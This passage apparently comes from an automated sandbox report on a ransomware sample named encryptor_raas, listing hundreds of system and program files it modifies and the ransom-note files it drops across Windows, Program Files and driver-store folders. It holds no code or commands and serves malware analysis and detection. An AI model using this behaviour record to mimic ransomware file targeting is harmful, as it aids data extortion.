File created C:\Windows\System32\DriverStore\FileRepository\mdmsuprv.inf_amd64_neutral_31d10a1a73b4feaa\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremiumN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prngt002.inf_amd64_neutral_df2060d80de9ff13\prngt002.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Enterprise\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\LogFiles\AIT\AitEventLog.etl.005 C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\StarterN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\EnterpriseN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\HomeBasicE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpd4100t.exp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\Licenses\_Default\HomeBasic\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\bthprint.inf_amd64_neutral_3c11362fa327f5a4\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmgl002.inf_amd64_neutral_e204d4267d752eb7\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmgl003.inf_amd64_neutral_4c78da9e48068043\mdmgl003.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmsmart.inf_amd64_neutral_829e8c7d1c8d5207\mdmsmart.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_providers.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_functions_advanced.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\angel264.inf_amd64_neutral_04b54b6322607cce\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wialx003.inf_amd64_neutral_db618863f9347f9a\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_02.MID C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14582_.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\SpaceSelector.ico C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_bullets.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\GetExpand.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR18F.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_over.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\az.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\inf\netbvbda.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UnInstallProfile.SQL C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_netfx-aspnet_webadmin_images_b03f5f7f11d50a3a_6.1.7600.16385_none_3b995fcfc0e586ab\image2.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\Users\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..l-starter.resources_31bf3856ad364e35_6.1.7600.16385_en-us_24090ddf20410f44\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_bd4d20299386f90e\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_es-es_76b445ae591253e2\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\avmx64c.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmbr008.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-push_31bf3856ad364e35_6.1.7600.16385_none_cc073ae540855a07\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-afternoon_31bf3856ad364e35_6.1.7600.16385_none_2a05e57d5ab3659e\Windows Hardware Fail.wav C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_join.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_2c8a1d1c5da2edf8\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_notes-txt-background.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..-startere.resources_31bf3856ad364e35_6.1.7600.16385_it-it_67246ac68055bec8\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..fessional.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_98af26a5072718fa\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmbsb.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..homebasic.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_c985fbedc9886bd1\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\NavigationLeft_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_d7244b05e242e449\square.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\23.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..-startern.resources_31bf3856ad364e35_6.1.7601.17514_es-es_c82940e03ac63534\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-h..putername.resources_31bf3856ad364e35_6.1.7600.16385_it-it_ec2a8bc0ed056604\OOBE_HELP_Change_Computer_Name.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_5d0f22c9e44cb6ed\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-sonic-symphonyntsc_31bf3856ad364e35_6.1.7600.16385_none_d75d6085d60aa50d\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Scenes\img28.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-ca-component_31bf3856ad364e35_6.1.7601.17514_none_fae061a2e0ae5019\CA-wp6.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_functions_advanced_methods.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_6f6cca095bde05bb\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-tapicore_31bf3856ad364e35_6.1.7600.16385_none_402eca316047a0fe\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\wialx005.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
